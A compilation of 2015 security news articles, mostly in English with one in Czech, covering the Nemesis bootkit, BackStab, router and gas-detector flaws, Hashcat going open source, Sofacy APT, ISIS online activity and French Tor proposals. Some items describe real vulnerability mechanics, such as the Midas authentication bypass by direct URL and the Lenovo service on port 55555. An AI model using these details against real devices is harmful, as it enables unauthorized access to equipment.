In a normal boot, any Windows PC reads data from a hard drive's MBR (Master Boot Record) that loads the VBR – a piece of code specific to an operating system containing instructions for the OS to begin the boot process.
The process typically looks like this:
The VBR then normally loads the operating system code, but BOOTRASH loads:
First, the malicious code that injects the Nemesis components stored in the virtual file system into the Windows kernel
Then the Operating System code
Since BOOTRASH is loaded outside of the machine's OS, it is not subject to any kind of integrity checks, nor are any of its components scanned by system's Anti-Virus program, which helps the malware evade detection.
According to the researchers, versions of BOOTRASH are targeting both 32-bit and 64-bit Windows architectures. Moreover, due to this newly added Bootkit component, reinstalling the OS will not remove the Nemesis malware.
Hackers behind Nemesis Malware
FireEye researchers believe the Nemesis bootkit malware belongs to a financial crime group of hackers, likely based in Russia, called FIN1.
"We identified the presence of a financially motivated threat group that we track as FIN1, whose activity at the organization dated back several years," FireEye researcher wrote. "The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as ‘Nemesis’ by the malware developer(s)."
The researchers believe that the FIN1 hacking group used this malware, most of the times, to access victims environment and steal cardholders data. In the past, the researchers came across different versions of the Nemesis family when they analyzed FIN1's malware.
How to Protect Your Systems From Nemesis Bootkit Malware?
Re-installing the operating system of your Windows machine is not a sufficient method to get rid of this malware.
The solution against this malware threat is to use software tools that can access and scan raw disks at scale for evidence of Bootkits, or physically wipe the disks before reinstalling the operating system.
"System administrators should perform a complete physical wipe of any systems compromised with a bootkit and then reload the operating system," FireEye researchers recommend.
Nemesis is by no means the first malware family to hijack normal boot process of a PC in an effort to gain persistence and stealth, but it is not the first malware family that contains bootkit functionality.
In the past, researchers detected malicious threats such as TDL4 (Olmarik), Rovnix, Necurs, and Carberp. Among these, Carberp banking trojan targeted financial institutions.

Like it or not, Microsoft Plans to Push Windows 10 Upgrade more Aggressively
Like it or not, Microsoft plans to Push Windows 10 Upgrade with new Strategy
This is no surprise that Microsoft wants you to install Windows 10.
But, Hey Microsoft, Not everyone wants to upgrade to Windows 10. Many people are happy with Windows 7 or Windows 8.1 OS and don’t want to switch to the newest Windows 10 operating system.
Days after the launch of Windows 10, Microsoft started offering Free Windows 10 installation to every Windows user. The marketing strategy successfully worked for Microsoft and just within a week after the launch, Windows 10 started running on millions of PCs.
Then the company went into planning other tricks in order to get on to the maximum number of PCs as possible. It silently started pushing Windows 10 installation files on PCs running Windows 7 or Windows 8.1, even if users have not opted into the upgrade.
Also Read: Reminder! If You Haven't yet, Turn Off Windows 10 Keylogger Now.
Less than two months ago, some Windows 7 and 8.1 users also claimed that Windows 10 had begun to install itself automatically on their PCs, which Microsoft later called it a mistake.
More Aggressive Windows 10 Upgrade Strategy
Now, Microsoft is going to kick off a more aggressive Windows 10 Upgrade strategy.
The new operating system that showed up first as optional, and then as recommended download in Windows Update, will soon show up – "Yes, I want to upgrade."
Yes, those Windows 7 or 8.1 users who are trying to block the Windows 10 upgrade will find that the upgrade has just not gone away.
Must Read: Just Like Windows 10, Windows 7 and 8 Also Spy on You – Here's How to Stop Them.
This is because Microsoft has recently made some changes to settings on Windows 7 and 8.1 machines that were previously configured not to receive the Windows 10 upgrade.
The settings have been reset in such a way that one of the updates that the company deployed on Windows 7 and Windows 8.1 machines keeps on checking every day to make sure that no other changes are made to this behavior.
Windows 10 Update Being Re-offered Several Times
The issue was reported by Josh Mayfield, the creator of GWX Control Panel, an app used to block the upgrade to Windows 10.
The developer received several reports from its users who specified that their preferences of not upgrading to Windows 10 reset up to several times a day and the Windows 10 update presented to them again.
"Over Thanksgiving weekend I started getting reports that the Windows Update 'AllowOSUpgrade' setting was getting flipped back on on a number of peoples' PCs, and it keeps resetting itself at least once a day if they switch it back off," Josh Mayfield said as reported by Computerworld.
Microsoft stated about a month ago that it intends to push the new operating system much more aggressively in the new year, re-categorizing Windows 10 as a "Recommended Update" in its Windows Update service.
So don’t be surprised if, in coming days, the Windows 10 installation process starts again, and again, until you finally lay down your arms and allow the Windows 10 upgrade, or simply move on to another operating system.

BackStab Malware steals iOS and BlackBerry Backups

Security experts at Palo Alto Networks have uncovered a new strain of malware dubbed BackStab that steals local mobile data backups.
Security experts at Palo Alto Networks have uncovered a new strain of malware dubbed BackStab that steals local mobile data backups and transfer it to the C&C server.

The malware is not able to steal data from the mobile device, instead it searches for data backup from the infected PCs. The malware scans for backups created by the mobile devices or by any other software that creates automatic backups.

BackStab Malware is able to Steal both iOS and BlackBerry Backups via compromised computers.

The malware exploits the fact that many backup tools don’t implements encryption, so the malicious code easily finds the backups and access data it contains.

As explained by the experts, the BackStab malware doesn’t need to have higher-level privileges or root access to the device or the infected computer.

BackStab has been in the wild for over five years, the experts at Palo Alto Networks have discovered six trojan families that used the technique to steal backup data in attacks across 30 countries.

“We have identified 704 samples of six Trojan, adware and HackTool families for Windows or Mac OS X systems that used this technique to steal data from iOS and BlackBerry devices. These attacks have been in the wild for over five years, and we have observed them deployed in over 30 countries around the world.” state a blog post published by PaloAlto Networks

backstab malware

According to Palo Alto researchers BackStab still not supports Android backups.

The experts provided a detailed description about how the BackStab works and mitigation strategies.

“Under certain conditions, mobile devices automatically create un-encrypted backup files on a local computer when they are attached through a USB port. Apple iOS devices began doing this when iTunes backup was introduced with the first generation iPhone in 2007. When users choose the default backup options, the contents of their phone is stored, unencrypted on their computers local hard drive in a well-known location. Forensics experts have known about this behavior for years and have exploited it to gain access to iOS device content even when they cannot directly access an iPhone due to it’s strong protections.”

Security experts suggest users to use a backup solution that implement data encryption, keep the OS and the application up to date, and “do not click “Trust” on the popup that appears every time they connect their phone to a new computer.”

Nemesis, a bootkit used to steal payment card data

Nemesis is a new strain of malware, very hard to detect and remove, designed to steal payment card data and implementing bootkit functionalities.
Experts at FireEye have discovered a new strain of malware designed to steal payment card data. Nothing new, you are probably saying, but this malware dubbed Nemesis is very difficult to detect and remove.

FireEye has identified the threat actor behind the new Nemesis malware, it is the hacking crews FIN1, which is suspected of being a group of criminals from Russia.

The FIN1 criminal gang has been known to target financial institutions worldwide, it used the Nemesis malicious code to compromise an unknown organization that processes financial transactions.

Nemesis malware

Organizations in the retail industry who manage payment card data are privileged targets of cyber criminal gangs, Target, Home Depot, Neiman Marcus are just a names of illustrious victims of the cyber crime.

Nemesis belong to the family of malware identified as bootkit, BIOS bootkits was mentioned when Snowden disclosed the catalog of surveillance tools used by the NSA ANT division, these malware are able to compromise the BIOS of the victim’s machine ensuring persistence and implementing sophisticated evasion techniques.

“In September, Mandiant Consulting identified a financially motivated threat group targeting payment card data using sophisticated malware that executes before the operating system boots. This rarely seen technique, referred to as a ‘bootkit’, infects lower-level system components making it very difficult to identify and detect.” states FireEye in a blog post“The malware’s installation location also means it will persist even after re-installing the operating system, widely considered the most effective way to eradicate malware.”

Even when the operating system is reinstalled, the bootkit can remain in place.

“Malware with bootkit functionality can be installed and executed almost completely independent of the Windows operating system,” the post continues.

In early 2015, the FIN1 threat actors added to its arsenal a utility that modifies the legitimate system Volume Boot Record (VBR) and hijacks the system boot process, in this way the criminals ensure the loading of the Nemesis malware before the Windows operating system. The utility was called by the experts at FireEye BOOTRASH, the only way to detect it is to use a raw disk scanner.

“Similarly, re-installing the operating system after a compromise is no longer sufficient. System administrators should perform a complete physical wipe of any systems compromised with a bootkit and then reload the operating system.”

The experts at FireEye Mandiant have found the bootkit by using a tool called Mandiant Intelligent Response (MIR) that allows for raw disk access and scan.

Linksys wireless routers are open to cyber attacks

According to an advisory published by the KoreLogic firm the Linksys EA6100-6300 wireless routers are vulnerable to attacks due to flawed CGI scripts.
Once again IoT devices are in the headlines, once again SOHO routers are affected by a security vulnerability that opens users to cyber attacks. According to the KoreLogic firm, the flawed devices are the Linksys EA6100-6300 wireless routers, the company has published an advisory reporting that security issues affect the CGI scripts in the admin interface opening the device to remote attacks.

“Multiple CGI scripts in the web-based administrative interface of the Linksys EA6100 – EA6300 Wireless Router allow unauthenticated access to the high-level administrative functions of the device.” the advisory says

“This vulnerability can be leveraged by an unauthenticated attacker to obtain the router’s administrative password and subsequently arbitrarily configure the device.”

Linksys EA6100 - EA6300 Wireless Router

Many of the CGI scripts in the admin interface provide an attacker with unauthenticated access to the device allowing him to get the router’s admin password.

“Other CGI files that are accessible from an unauthenticated perspective can be used to configure settings for the affected device. This led to the development of an exploit to abuse these vulnerabilities.” the advisory continues.

The flawed scripts include the bootloader, sysinfo.cgi, ezwifi_cfg.cgi, qos_info.cgi and others.

The company the security issued to Linksys, but it still waiting for a reply, the Linksys EA6100-6300 wireless routers are consumer products, this means that once the security update will be available end-users will have to apply it. Unfortunately in many cases end-users fail to apply the patches and end users remain open to cyber attacks.

Matt Bergin of KoreLogic also published a proof-of-concept code provided with the advisory. The PoC includes the code for testing the Linksys EA6100-6300 wireless routers to see if they still use the factory admin password.

Waiting for a fix let me suggest to disable the remote admin access to your Linksys EA6100-6300 wireless router.

Hashcat, the fastest Password Cracking utility is now Open Source

Hashcat, the popular password recovery tool has been released as open source under the MIT license. You can contribute to it.
The popular password cracking tool Hashcat is not an open source software, the announcement was first made on December 4 on Twitter via an MD5 hash that posted the following message:

“hashcat open source”

The source code for both utilities Hashcat and oclHashcat is now available on the GitHub repository.

The main Hashcat developer, Jens ‘atom’ Steube, has later published a post on the Hashcat official forum to announce the availability of the source code for both Hashcat and oclHashcat software.

Hashcat is the a fast and advanced GPGPU-based password recovery utility, meanwhile oclHashcat is the respective GPU-based version.

hashcat ntlm

Why Does Hashcat go Open Source?

Steube, who is a strong supporter of open source software, decided to release the software to allow software and security experts to review the code and improve it, for example integrating external libraries.

The software is under the MIT license to allow an easy integration or packaging for the most common Linux distributions.

“Actually, I am a big fan of open source software, and I’ve always held the idea of eventually going open source at some point in the future. The difficult questions were when would we be ready to do so, and when would be the best time to do it.” states the post.

Up until now, Hashcat is not supported on OS X because Apple does not allow “offline” compiling of kernel code. Now that the Hashcat project goes open source, users will be able to compile the GPU kernels and use oclHashcat also on OS X.

“Currently there is no native support for OSX. The main reason for this is that Apple does not support “offline” compiling of the kernel code. Technically, the missing piece is what AMD allows through CL_CONTEXT_OFFLINE_DEVICES_AMD in its OpenCL runtime. This would allow the compilation of GPU kernels for devices which are not currently attached to the development system. With an open source project, you can easily compile the kernels using the Apple OpenCL Runtime “just in time”, also known as JIT, and hence lift that restriction. This means that support for oclHashcat on OSX would be possible for the first time.” Steube explains.

Steube in the past worked with the experts at Kaspersky Lab, assisting them in cracking hashes related to the Gauss malware and the Equation group.

Experts at Kaspersky Lab published a blog post early this week to explain the benefits of password cracking tools going open source.

“One of the main [password cracking tool] user-groups are penetration-testers. Their job is to evaluate the security in given areas including evaluation of password security. Also forensic-examiners use these tools in order to gain access to required evidence. These cases and tasks are often highly sensitive and apply to strict rules,” explained Marco Preuss. “OpenSource offers the possibility of developing customized extensions without leaking any potential sensitive information to external developers of such tools. This applies if different hash-algorithms are required to be audited while pentesting or specific requirements are set in forensic cases e.g. criminal evidence collection for an upcoming lawsuit.”

Steube will continue to support the Hashcat project

“No way I’d do that! I’ll stay here, providing the same effort as before,” the developer said.

Every but could be submitted to the development team, along with new features.

Notebooky od Lenova, Toshiby a Dellu obsahují nebezpečný software

Bezpečnostních chyb nalezených v podpůrném softwaru předinstalovaném výrobci přenosných počítačů přibývá.

Nové chyby byly objeveny v aplikacích Lenovo Solution Center, Toshiba Service Station a Dell System Detect, přičemž jako nejzranitelnější se jeví první jmenovaná, která na počítačích s operačním systémem Windows může šikovným útočníkům dovolit prostřednictvím webových stránek spustit škodlivý kód.

Chyby objevil a upozornil na ně hacker z řad veřejnosti a přiměl tak k reakci koordinační centrum CERT z Carnegie Mellon University, které vydalo bezpečnostní výstrahu.

Jeden z problémů způsobuje LSCTaskService, služba vytvářená aplikací Lenovo Solution Center, na kterou jsou navázána systémová oprávnění. Služba otevírá http démon na portu (55555), který je schopen přijímat příkazy. Jeden z nich, s názvem RunInstaller, přitom kontroluje soubory umístěné v %APPDATA%\LSC\Local Store folder.

Do tohoto adresáře může zapisovat kterýkoliv uživatel, bez ohledu na oprávnění, nicméně soubory jsou spouštěny jako systémové, což znamená, že i cizí uživatel může využít této chyby a získat plnou kontrolu nad systémem.

Díky návazné chybě navíc útočník ani nemusí vkládat vlastní soubory do zmíněného adresáře. A aby toho nebylo málo, LSCTaskService je zranitelná i skrz takzvanou cross-site request forgery (CSRF), útok do internetových aplikací pracující na bázi nezamýšleného požadavku pro vykonání určité akce v této aplikaci, který ovšem pochází z nelegitimního zdroje.

Což ale znamená, že aby útočník zneužil první dvě chyby, nemusí mít ani lokální přístup do systému, ve kterém je nainstalováno Lenovo Solution Center a stačí mu uživatele dostat na škodnou webovou stránku.

Chyby dalších jmenovaných výrobců už tolik závažné nejsou. Aplikace Toshiba Service Station vytváří službu TMachInfo, která běží jako systémová a přijímá příkazy skrz UDP port 1233. Jeden z nich, nazvaný Reg.Read, lze využít ke čtení většiny registrů Windows jako systémový uživatel. „Nevím, k čemu to využít, ale někdo jiný by mohl vědět,“ píše ve své zprávě hacker s nickem slipstream.

A chyba, kterou objevil v Dell System Detect paradoxně vyplynula z řešení, kterým se Dell pokusil záplatovat předchozí jinou chybu. Týká se ověřovacích podpisů RSA-1024, u nichž je údajně potíž v tom, že je firma umístila na své webové stránky, kde s k nim mohou dostat útočníci a následně je zneužít.

Lenovo uvedlo, že chyby prověří a poskytne potřebné záplaty, než tak ale učiní, uživatelé si prý mohou Lenovo Solution Center odinstalovat. Toshiba a Dell se k problémům zatím nevyjádřily.

Stepping out of the dark: Hashcat went OpenSource

While passwords are still an essential topic in IT-Security, the recovery and cracking of those is as well. There are several tools focusing on password recovery while two of them stand out of the crowd: Hashcat/oclHashcat and John-the-Ripper (JtR).

We already mentioned Hashcat in our blog on account password security here.
Jens Steube – the mind behind Hashcat -also supported our research on the Gauss malware by creating the oclGaussCrack.
Beginning of this year we also asked for help on the Equationgroup MD5 “e6d290a03b70cfa5d4451da444bdea39”. Jens Steube and Philipp Schmidt solved it as arabic word for “unregistered”.

Last Friday, a “cryptic” message was posted on Twitter by @hashcat


The MD5 revealed a major step for Hashcat: “hashcat open source” – Jens ‘atom’ Steube decided to go OpenSource with his well-known Password recovering/cracking tool Hashcat/oclHashcat. Over this weekend, the github repository of Hashcat was among the top trending and collected already more than 1,000 “stars“.

Screenshot by
Repository Official Announcement


Hashcat and oclHashcat

This project implements a rich set of features of attacks against a long list of algorithms. Hashcat is for CPU-based hash cracking while oclHashcat uses GPUs.

Why Password cracking tools and OpenSource?

There are many reasons why such tools are needed. One of the main user-groups are penetration-testers. Their job is to evaluate the security in given areas including evaluation of password security. Also forensic-examiners use these tools in order to gain access to required evidence. These cases and tasks are often highly sensitive and apply to strict rules. OpenSource offers the possibility of developing customized extensions without leaking any potential sensitive information to external developers of such tools. This applies if different hash-algorithms are required to be audited while pentesting or specific requirements are set in forensic cases e.g. criminal evidence collection for an upcoming lawsuit.

The implemented functionalities also try to push for stronger security by revealing unsecure hash-algorithms or vulnerabilities and weak passwords. This is must not be underestimated, as driving the evolution and development of new secure algorithms is an important and necessary step. [see Collision Vulnerabilities in MD5, SHA1 and SHA2.

Hashcat as OpenSource under the MIT License will now open possibilities of integrating other libraries and porting the software to other platforms. Hashcat may now also be integrated into Linux distributions and thereby opening up for a broader audience, since it’s even easier to use.

It’s difficult to foresee the future, but for sure we’ll see more development in this area – for a good reason.

Save the Date — 11th December: Anonymous to Celebrate 'ISIS Trolling Day'
After hacking and taking down social media accounts of ISIS members, the online Hacktivist group Anonymous is back again with its new plan to harass the Islamic State (IS) militant group that was behind the horrific terror attack in Paris.
Anonymous declared total war against ISIS after the last month's Paris attacks and supposedly:
Took down thousands of Twitter and social media accounts used by the ISIS terrorists
Disrupted the terror group's primary communications platform
Replaced one of ISIS' websites with a Viagra ad
Now, the hacktivist group has declared December 11th to be "ISIS Trolling Day," planning an organized trolling campaign against ISIS by assaulting their image through Photoshopped images, memes, videos and jokes related to the terrorist organisation.
Also Read: ISIS Issues 5 Lame Tips for its Members to Avoid Getting Hacked
Vanish ISIS Online Presence
This campaign is also part of the group's ongoing effort to disrupt and dishonor the ISIS terror organization's online presence.
Western-living Muslims usually fall for ISIS' intimidating social media propaganda, so rebranding the militant group as a joke may be one of the best ideas Anonymous hackers ever had – attacking the ideas that ISIS is trying to spread online.
Anonymous has also asked netizens to be part of this trolling campaign as an effort to mock ISIS members and supporters for "the IDIOTS they are."
Also Read: Check Out How Anonymous Hackers Can Disrupt ISIS Online Propaganda
ISIS Trolling Day's Goals
According to a Ghostbin post, the trolling campaign will take place on Twitter, Facebook, Instagram, YouTube, and in the real world.
"We'll show them what they really are they don't stand for a religion, they don't stand for a God, they're brainwashers teaching from the young to the old their propaganda against the 'West' when in reality they're just increasing the distance between countries by giving many a bad name," the post reads.
Here are some of the campaign goals:
Use #Daesh or #Daeshbags (ISIS hates being called Daesh)
Post mocking photographs of ISIS on Instagram, Twitter, Facebook
Try to get #Daeshbags trending on Twitter
Post photographs of captured ISIS members and mock them
Use #'s that ISIS members use, but post mocking pictures instead
Make insulting videos of ISIS as well
Print out photos or stickers that mock ISIS and spread them around your city
JOIN US! DECEMBER 11, 2015! #OPISIS — Official #DayOfRage (@OpDayOfRage) December 5, 2015
Now, let's see what kind of real impact this campaign will make at the end of the day, but free speech and taunt can be a way more powerful tool when fighting a war of ideas.

Critical vulnerabilities found in Honeywell Midas Gas Detectors

Another vulnerable IoT device is in the headlines, this time two serious vulnerabilities affect the Honeywell Midas gas detectors.
Honeywell has just released firmware updates for its Midas gas detectors to fix two high severity vulnerabilities.

The Midas gas detectors are a category of product manufactured by Honeywell to detect toxic, ambient and flammable gasses in the environment.

Midas gas detectors are usually used in light industrial manufacturing, university laboratories, semiconductor processing, and aerospace. Any unauthorized changes to the configuration of the Midas gas detectors could lead to wrong gas level measures, that could cause serious damage of industrial equipment and even the loss of human life.

According to the security expert Maxim Rupp, the Midas gas detectors running firmware versions 1.13b1 and prior, and Midas Black products running firmware versions 2.13b1 and prior are affected by two serious flaws (CVE-2015-7907, CVE-2015-7908) that can be easily exploited without having specific skills.

The first flaw (CVE-2015-7907) is a path traversal vulnerability that received the CVSS score of 8.6, it can be exploited by a remote attacker to bypass the authentication mechanism implemented to protect the web interface.

The access to the web interface gives the attackers full control on the configuration of the Midas gas detectors, ill-intentioned can exploit it to launch calibration and test processes.

The second flaw (CVE-2015-7908), that received the CVSS score of 9.4, is related to the transmission of the user passwords, the secret code are in fact transmitted in clear text.

“Successful exploitation of these vulnerabilities could allow a remote attacker to gain unauthenticated access to the device, potentially allowing configuration changes, as well as the initiation of calibration or test processes.” states the Advisory published by the ICS-CERT.

“Impact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation.”

Honeywell Midas gas detectors 2

Basically, the attacker can bypass authentication on the vulnerable Midas gas detectors simply by typing the URL of the page they want to access, for example, http://<host>/Network.htm. Rupp also discovered that the administrator password in embedded in clear text in the source code of the Security.htm page.

Rupp reported the flaws to the ICS-CERT which forwarded them to the Honeywell in July, the company fixed the vulnerabilities in October.

Honeywell urges its customers to apply the security patches, meantime protect the access to the Midas gas detectors, for example placing them in DMZs and using a firewall.

France wants to BAN Tor and Free Wi-Fi Services after Paris Terror Attacks
Now this was to be done, Sooner or Later – The Government.
In the wake of the recent deadly Paris terror attacks, the French government is considering new laws that would Ban access to Free Wi-Fi and the Tor anonymity network, according to a recent report by French newspaper Le Monde.
The report cites an internal document from the Ministry of Interior by French Department of Civil Liberties and Legal Affairs (DLPAJ) that lists two proposed bills – one around the State of Emergency and the other on combating counter-terrorism.
Last month's Paris attacks started blame games, calling Edward Snowden and end-to-end encrypted services responsible for the ISIS-sponsored massacre.
Also Read: Anonymous declares War on ISIS: 'We will Hunt you Down!'
Now, the government has started renewing their assault on encryption and reviving their efforts to force tech companies to hand over encryption keys, and the document obtained by Le Monde hints the same.
Proposed Pieces of Legislation
State of Emergency Proposal: In this law, the French government is considering to Forbid the use of Free and Shared Wi-Fi connections during a state of emergency. Also, if the owners of public Wi-Fi networks did not disconnect, they could face criminal penalties.
According to the police, the reason behind restricting access to free or shared Wi-Fi is that it is apparently difficult to track suspects who use public Wi-Fi networks to communicate, so the law would shut down public Wi-Fi hotspots during a state of emergency.
The state of emergency increases the powers of the police in the country. During the state of emergency, French police may search residences without a warrant, tighten border controls, and even ban public protests.
Proposal for Combating Counter-Terrorism: This legislation proposal says the government is banning or blocking communications of the Tor network as well as requiring service providers to hand over encryption keys to police – not just during a state of emergency.
Indeed, in this section of the document, the Department of Civil Liberties and Legal Affairs questioned whether such proposed pieces of legislation might violate the French Constitution.
Also Read: Would Encryption Backdoor Stop Paris-like Terror Attacks?
The Onion Router, or TOR, is an anonymising network maintained by volunteers, which routes users’ data requests globally, making it very hard (but not impossible) to discover the actual user behind the computer screen.
Tor is an easy tool to hide your real identity on the Internet and is used not only by journalists, whistleblowers, and privacy concerned people, but also by terrorists, pedophiles, and cyber criminals.
Both pieces of legislation, according to Le Monde, could appear as soon as January 2016.
If block, France would be the first European country to block TOR. Though there is no easy way to block the anonymising network, China and Iran have both made successful attempts to block TOR.

Chakra JavaScript Engine: Microsoft Open-Sources the Heart of Edge browser
Chakra: The Open-Source JavaScript Engine of Microsoft Edge browser
Microsoft has announced the plans to open source the core components of its "Chakra" – the JavaScript engine behind the new Edge browser – to GitHub code-sharing and collaboration repository next month.
The company made this announcement at the JSConf US Last Call conference in Florida this weekend.
What is Chakra?
"Chakra," developed in 2008, is a self-contained JavaScript virtual machine that Microsoft now lets developers implement in their own products and applications.
Though Chakra is at the core of only Microsoft's Edge, it is used across the Microsoft's newest operating system Windows 10 to power Universal Apps on Xbox, Windows Phone and tablets.
Chakra Going Open Source as ChakraCore
ChakraCore – is what Microsoft is calling the open source version of its Chakra – will be made available on GitHub under an MIT open source license in January 2016, with support from Intel, AMD, and NodeSource.
According to the Microsoft's official blog, "We're investing more than ever in improving Chakra and are excited to team up with our community to drive further improvements. In addition to the public [Microsoft means the 'open source community'], several organizations have already expressed interest in contributing to ChakraCore — among many others, we look forward to working with Intel, AMD and NodeSource as we develop this community."
ChakraCore Doesn't Include:
There are some differences between ChakraCore and Chakra as ships in Windows 10. The complete Chakra contains the adhesive between both:
The JavaScript engine and the browser's HTML engine
The JavaScript engine and the Universal Windows Platform
Chakra also has diagnostic APIs (Application Program Interfaces) that use COM and hence are Windows-specific.
However, neither of the above are part of the open source ChakraCore project. It only contains the 'core packages' for the engine, so doesn't expose Chakra's private bindings to the Edge browser or Universal Applications or make available COM diagnostic APIs.
What Does Chakra Offer?
The fully supported and open source ChakraCore project includes everything:
The parser
The interpreter
The JIT (just-in-time) compiler
The Garbage collector
The application programming interface (API) used to embed the engine into apps (like used in Edge)
It's an interesting and impressive move from the company like Microsoft that has rarely open sourced its projects. With this move, the company believes ChakraCore will be used in a large number of apps in the future, from cloud services to the Internet of Things (IoT).
Isn't that an exciting New Year gift for developers?

Arabian tales by ‘Nigerians’
7.12.2015 Zdroj: Kaspersky
The war in Syria, which began several years ago, has recently become one of the most widely reported events in the media. Along with the growing interest of the international community in Middle East events, “Nigerian” scammers have also jumped on the bandwagon. Over the last few months, we have recorded an increase in the number of fraudulent emails utilizing the Syrian theme.

The authors of most of the emails introduced themselves as Syrian citizens seeking asylum in Europe, and requested assistance in investing large sums of money. The messages were either short, with just enough info to arouse the recipient’s interest, or provide a detailed description of the offer.

Arabian tales by 'Nigerians'

Fraudsters often send out emails on behalf of women whose husbands have supposedly been killed or died. This theme was exploited with little or no changes in the Syria-related emails. A “widow” writes that her husbands had been killed and now she has a large sum of money that she wants to transfer to another country – she usually wants to get out of Syria too.

Arabian tales by 'Nigerians'

Fraudsters can also distribute emails on behalf of employees or owners of companies. To make the email more convincing, the text may include the names of real organizations. The authors of the emails provide a variety of stories to hook the recipient. For example, one of them says he has successfully transferred his assets to France but could not get a visa, so he is asking for help in case he cannot get to Europe.

Arabian tales by 'Nigerians'

The scammers are trying not only to get recipients interested by promising financial rewards but to evoke pity and compassion. In particular, the pseudo-Syrian citizens complain of harassment by the president and ask for help transferring and preserving their money.

Arabian tales by 'Nigerians'

English is the most popular language with the “Nigerian” scammers; however, we have come across emails in other languages: German, French and Arabic. The author of a German-language email introduced himself as an officer of the Syrian army fighting against ISIS; he writes that he wants to move $16 million earned by selling oil out of the country, and asks the recipient to contact him for more information. In particular, the fact that the citizens of Syria and other Arab countries have large amounts of money is often explained by various stories related to oil deals.

Arabian tales by 'Nigerians'

An email in French is written on behalf of a young Syrian refugee whose relatives were killed in the war in Syria and who is now staying in Germany. She complains about the unbearable cold in the tent she lives in, and about the promises of the authorities to improve the living conditions which are never fulfilled. She asks the recipient to take her in in exchange for a large sum of money.

Arabian tales by 'Nigerians'

Finally, the emails in Arabic, the official language of Syria, tell a sad story about a widow from Damascus, whose husband and children were killed during a bombardment using chemical weapons. The tale of the unhappy woman is intended to evoke the recipient’s sympathy while also mentioning a large sum of money that should tempt the recipient to help.

Arabian tales by 'Nigerians'

“Nigerian” scammers are trying to make their stories believable so they are using a standard set of tricks: links to legitimate news sources, detailed emotive stories where real events are mentioned, including well-known personalities, etc. However, it is worth remembering that emails from unknown senders offering you millions of dollars cannot be genuine. Therefore, the best solution is to simply delete the email and not enter into correspondence with the scammers.

Cyber spies of the Sofacy APT increased its operations tenfold

According to a new report published by the Kaspersky Lab, the Sofacy APT has recently increased its activities.
According to a new report published by the Kaspersky Lab, the Advanced persistent threat group Sofacy (also known as APT28 , Fancy Bear, Sednit, and STRONTIUM) has increased its activity.

The Sofacy group has been active since 2008, targeting mostly military and government entities in NATO countries, the experts speculate that its is a nation-state actor.

The experts speculate that the Sofacy has increased its operations tenfold by targeting high-profile entities by using a new set of hacking tools.

In the last months, the researchers have uncovered a series of attacks, relying on a new set of tools and zero-day exploits, and targeting defense-related targets with specific focus with the Ukraine.

“In the months leading up to August, the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office, Oracle Sun Java, Adobe Flash Player and Windows itself. For instance, its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox. ” state a blog post published by Kaspersky Lab.

sofacy eng_1

The experts spotted a rare modification of the AZZY backdoor used by the threat actors for reconnaissance purposes. The first versions of the AZZY backdoor were discovered in August, once the attackers compromise the target they use more backdoor for lateral movements.

“The attackers deploy a rare modification of the AZZY backdoor, which is used for the initial reconnaissance. Once a foothold is established, they try to upload more backdoors, USB stealers as well as other hacking tools such as “Mimikatz” for lateral movement,” continues the post.

Kurt Baumgartner, principal security researcher at Kaspersky Lab, explained that the Sofacy APT group is very technically capable, it is able to design new hacking tools depending on the specific target.

“This quick work is a new characteristic of their work, and this stepped up urgency is something that is unusual. In general, APT intrusions can last months or longer, and in these cases, we see Sofacy acting with unusually ramped urgency,” Baumgartner said.

We will continue to follow the operations of the Sofacy APT group, stay tuned …

ISIS members have developed a mobile app for its communications

Ghost Security Group has reportedly discovered an Android mobile application used by members of the ISIS organization for secure communications.
According to the Christian Science Monitor, the Ghost Security Group has reportedly discovered an Android mobile app used by members of the ISIS organization.

The Ghost Security Group is the notorious group of cyber experts in counter-terrorism networks that is involved in a series of initiatives against the ISIS radical group online.

In July, the group has supported US law enforcement and Intelligence agencies in thwarting ISIS terror plots in New York and Tunisia.

The Android app discovered by the experts is spread through hidden channels in popular messaging apps like Telegram. The ISIS members have developed the app as an alternative communication channel, the mobile application is reportedly used to spread propaganda and share information on the operations of the group.

“They want to create a broadcast capability that is more secure than just leveraging Twitter and Facebook,” Ghost Security Group chief operating officer Michael Smith II told the Christian Science Monitor. “Increasingly what you will see is the focus on developing means to control the distribution of their materials on a global scale.”

The discovery made by the Ghost Security Group demonstrates the cyber capabilities of the group, abilities that were discussed in the past by prominent experts, including the F-Secure Chief Research Officer Mikko Hypponen.

The popular expert said he worries about cyber extremists that could penetrate critical infrastructure and cause serious damages. The expert explained that the ISIS is probably the first group of terrorist that has hacking capabilities to manage a major attack against a government infrastructure, and the situation is getting worse because this group is gaining greater awareness of the effectiveness of an offensive launched by the cyberspace.

“The Islamic State is the first extremist group that has a credible offensive cyber capability,” said F-Secure Chief Research Officer Hyppönen, speaking last week at the Wall Street Journal’s WSJDLive conference in Laguna Beach, Calif. “Clearly, this situation isn’t getting better. It’s getting worse.”
In this period the US Congress is discussing the role of encryption in commercial products and services, and their potential abuse made by radical groups.

ISIS mobile app 2

Intelligence agencies and law enforcement bodies worldwide claim that terrorists have exploited encryption implemented in commercial communications platform to arrange terrorist attacks, including the one that hit Paris on November, 13.

In August, a US security consultancy discovered another app dubbed Nasher developed by the member of the ISIS. Also in that case, the Android app was spread through unofficial channels. Users were required to download a special code shared among jihadist online communities and install the app on their device manually.

Islamic State uses the app – which it calls Nasher – to catalogue written reports, radio news and video files.

At the time of writing, the landing page for the app’s APK (Android application package) file had been viewed over 7,500 times although there’s no telling how many downloads have been made.

ISIS mobile app-download-page

The French Gov wants to Block Tor and Forbid Free Wi-Fi

In response to the recent Paris terror attacks, the French government is proposing to forbid and block the use of the Tor anonymity network.

According to an internal document from the Ministry of Interior visioned by journalists at the French newspaper Le Monde. The document includes two proposals of legislation, one around the state of emergency, and the other related to counterterrorism measures.

The French Government is considering to “Forbid free and shared wi-fi connections,” the measures have to be adopted to avoid any abuse of public wi-fi networks. The law enforcement is difficult to track suspects and terrorists who use public wi-fi networks.

The most controversial part of the piece of legislation is related to the ban of the Tor network, the legislation could be presented as early as January 2016.

It Tor the evil’s instrument?

The Tor is the most popular anonymizing network, it is currently maintained by volunteers. The anonymity of its users is ensured by routing the user’s traffic through unpredictable routes within the network of servers it includes, obfuscating the sources of data and masquerading the IP address.

